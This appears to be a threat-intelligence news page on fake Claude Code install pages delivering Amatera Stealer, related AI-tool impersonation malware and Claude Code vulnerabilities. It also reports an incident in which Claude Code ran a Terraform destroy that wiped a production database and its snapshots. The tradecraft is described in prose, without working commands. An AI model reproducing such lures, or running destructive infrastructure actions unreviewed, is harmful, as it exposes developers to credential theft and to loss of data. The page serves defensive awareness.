Malicious and unsafe use of Anthropic Claude Code leading to malware delivery and destructive infrastructure changes
Push Security reported an “InstallFix” malvertising campaign targeting developers searching for Anthropic’s Claude Code CLI. Attackers clone the legitimate installation page on lookalike domains and buy Google Search ads so the fake pages rank highly for queries like “install Claude Code” and “Claude Code CLI.” While links on the page route to Anthropic’s real site, the copy‑paste install one‑liners are replaced with malicious commands that fetch malware from attacker-controlled infrastructure; the Windows flow was observed delivering the Amatera Stealer, with macOS users likely targeted by similar info-stealing malware.
Separately, a reported operational incident highlighted the risk of delegating privileged infrastructure actions to AI agents without strong guardrails: a developer described using Claude Code to run Terraform changes during an AWS migration and, after a missing Terraform state file led to duplicate resources, subsequent cleanup actions resulted in the deletion of production components, including a database and recovery snapshots—wiping roughly 2.5 years of records. Together, the reports underscore two distinct but compounding risks around AI coding agents: supply-chain style social engineering via fake install instructions and high-impact misexecution when AI-driven automation is allowed to operate with destructive permissions in production environments.
Timeline
May 1, 2026
NordVPN uncovers malware campaign impersonating Google Gemini CLI
NordVPN reported active campaigns using fake websites, cloned repositories, deceptive social posts, and planned typosquatted npm packages to impersonate Google Gemini CLI and trick developers into installing malware. The macOS variant used a Base64-encoded terminal command to download and run a malicious script with elevated privileges, while the Windows variant used a disguised PowerShell fileless attack to provide remote access and enable theft or lateral movement.
Apr 15, 2026
Expel reveals InstallFix scale and MSIX-based Claude Code variant
Expel reported that InstallFix-style fake software install pages had become widespread, accounting for 13% of malware incidents it observed in March 2026, and identified 46 malicious Anthropic-themed webpages over the prior month. The firm also described a GitLab.io-hosted fake Claude Code page that used mshta to fetch a file named claude.msixbundle containing hidden malicious HTML as an anti-analysis technique.
Mar 10, 2026
Google deactivates advertiser account tied to fake Claude Code campaign
Bitdefender said the malicious ad campaign likely used a compromised advertiser account associated with a Malaysian company. Google reportedly deactivated that advertiser account after the abuse was identified.
Mar 10, 2026
Bitdefender documents Windows and macOS malware from fake Claude Code ads
Bitdefender reported that a fake Claude Code documentation site hosted on a Squarespace subdomain delivered OS-specific malware via ClickFix-style instructions. On Windows it deployed multi-stage stealer payloads, while on macOS it delivered an obfuscated universal Mach-O backdoor capable of remote shell execution.
Mar 10, 2026
Push Security links Windows infection chain to Amatera Stealer
Analysis of the fake Claude Code campaign showed Windows victims were led through a staged execution chain involving cmd.exe and mshta.exe to retrieve attacker-hosted payloads. The resulting malware was identified as Amatera Stealer, an infostealer targeting credentials, cookies, tokens, and system data.
Mar 9, 2026
Researchers identify fake Claude Code install pages in Google ads
Security researchers reported a malvertising campaign using lookalike Claude Code installation pages and sponsored Google Search results to trick users into copying malicious install commands. The tactic was described as an "InstallFix" attack that weaponizes trusted one-line terminal commands.
Mar 8, 2026
Amazon Business Support helps restore deleted AWS data
After the destructive Terraform action, Grigorev contacted Amazon Business Support, which assisted with restoring the lost data. The recovery reportedly took about a day.
Mar 7, 2026
Grigorev publishes post-mortem and hardening changes
In a post-mortem, Grigorev said he would test restores, add deletion protections and tighter permissions, move Terraform state to S3, and require manual review and execution for destructive actions instead of letting the AI agent run them directly.
Mar 7, 2026
Developer's Claude Code/Terraform run destroys two AWS website environments
During a migration of AI Shipping Labs to AWS infrastructure shared with DataTalks.Club, Alexey Grigorev provided Terraform state late, causing Claude Code to follow that state and execute a Terraform destroy. The action wiped both sites' infrastructure, including a database and snapshots containing about 2.5 years of records.
See the full picture in Mallory
Mallory subscribers get deeper analysis on every story, including:
Who’s affected and how
Deep-dive technical analysis
Actionable next steps for your team
IPs, domains, hashes, and more
Ask questions and take action on every story
Filter by topic, classification, timeframe
Get matching stories delivered automatically
Related Entities
Threat Actors
Organizations
Sources
2 more from sources like toms hardware and breakglass intel
Related Stories
Malvertising and Supply-Chain Lures Impersonate AI Developer Tools to Deliver Infostealers and RATs
Threat actors are abusing interest in AI developer tools by impersonating installers and setup guides to trick users into executing malware. Fake installation-guide pages for Anthropic’s **Claude Code** were promoted via **Google Ads** to rank highly for searches like “Claude Code install/CLI,” leading Windows and macOS users to run copy-pasted commands in an **InstallFix** campaign (a variant of **ClickFix**) that ultimately deployed **Amatera** (an **ACR Stealer**-based MaaS infostealer). Push Security reported the malware steals browser-stored credentials, cookies, session tokens, and system information, and the infrastructure used legitimate hosting/CDN services (e.g., *Squarespace*, *Cloudflare Pages*, *Tencent EdgeOne*) to reduce suspicion. In a related AI-tool impersonation theme, JFrog identified a malicious **npm** package, `@openclaw-ai/openclawai`, posing as an **OpenClaw** installer that targets macOS users to steal credentials and establish persistent remote access. The package uses a `postinstall` hook to reinstall itself globally and registers a CLI via the `bin` field pointing to `scripts/setup.js`, which presents a fake installer UI and then prompts for the user’s system password via a bogus Keychain/iCloud authorization flow. The malware (self-identified as **GhostLoader**) was reported to collect browser data, crypto wallets, SSH keys, Apple Keychain databases, and iMessage history, while also deploying a **RAT** with **SOCKS5 proxy** capability and “live browser session cloning,” indicating a blend of credential theft and long-term access objectives.
1 months ago
Vulnerabilities in Anthropic Claude Code Enable Code Execution and API Key Exfiltration
Security researchers disclosed multiple vulnerabilities in **Anthropic’s Claude Code** AI coding assistant that could enable **arbitrary command execution** and **exfiltration of Anthropic API credentials** when developers clone/open a malicious repository. Check Point Research reported the issues abuse Claude Code configuration and initialization paths—particularly **project hooks** (e.g., untrusted `.claude/settings.json`), **Model Context Protocol (MCP) servers**, and **environment variables**—to trigger shell command execution and data theft. Anthropic’s advisory for **CVE-2026-21852** describes a project-load flow where a crafted repo can set `ANTHROPIC_BASE_URL` to an attacker-controlled endpoint, causing Claude Code to send API requests **before** the trust prompt is shown, potentially leaking the user’s API key. The disclosed issues include two high-severity code-injection paths (CVSS **8.7**) and one information-disclosure flaw (CVSS **5.3**): a consent-bypass/hook-based injection issue fixed in *Claude Code* **1.0.87** (Sept 2025), **CVE-2025-59536** fixed in **1.0.111** (Oct 2025), and **CVE-2026-21852** fixed in **2.0.65** (Jan 2026). Separate coverage framed Anthropic-related developments as market-moving, noting investor attention around Anthropic’s AI code-security tooling; however, the actionable security impact in this reporting is the risk that simply opening an attacker-controlled repository can lead to **RCE** and **credential leakage**, reinforcing the need to treat untrusted repos and tool initialization behaviors as a supply-chain and developer-workstation risk.
3 weeks ago
InstallFix malvertising campaign spreads fake Claude Code installers to deliver Amatera Stealer
Push Security reported a new **ClickFix-style** social-engineering campaign dubbed **InstallFix** that uses **Google-sponsored search ads** to drive developers to near-identical cloned “install” pages for *Anthropic Claude Code* and similar AI coding tools. Victims are prompted to copy/paste terminal commands from the fake pages; executing them installs **Amatera Stealer**, enabling credential theft and potential access to enterprise development environments. Separate reporting highlighted adjacent browser-based tradecraft: a previously legitimate Chrome extension (*QuickLens – Search Screen with Google Lens*) with roughly **7,000 users** was updated to deploy **ClickFix** attacks, strip web security headers, and steal cryptocurrency wallet seed phrases before being removed from the Chrome Web Store. A weekly threat bulletin also noted unrelated incidents (e.g., ransomware and data breaches) and separate AI-themed malicious extensions that harvest LLM chat histories, but those items are not part of the InstallFix/Claude Code malvertising campaign itself.
1 months ago